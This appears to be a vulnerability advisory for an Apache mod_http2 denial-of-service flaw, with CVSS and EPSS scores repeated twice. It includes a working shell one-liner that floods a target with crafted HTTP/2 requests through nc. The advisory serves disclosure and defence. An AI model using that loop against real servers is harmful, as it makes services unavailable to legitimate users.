7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.119 Low
EPSS
Percentile
94.5%
mod_http2 can be tricked by specially crafted requests to hold server resources longer than necessary.
A simple demonstration of this for a server with h2c enabled is as follows:
for x in seq 0 500
; do echo 505249202a20485454502f322e300d0a0d0a534d0d0a0d0a00001204000000000000000000006400044000000000020000000000001b0104000000018284864187089d5c0b8178ff7a8825b650c3abb6f2e053032a2f2a00001b0105000000019a84864187089d5c0b8178ff7a880000000000000000 | xxd -r -p | nc hostname port 2>&1 >/dev/null & done
Certain crafted HTTP2 requests identified with afl-fuzz can cause Apache worker threads to stay open waiting for data until a timeout. A typical configuration has a 1 minute timeout with 150 request workers. This means an attacker can effectively make the service unresponsive to legitimate users with a slow rate (3-4 requests/second) of short crafted requests.
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
0.119 Low
EPSS
Percentile
94.5%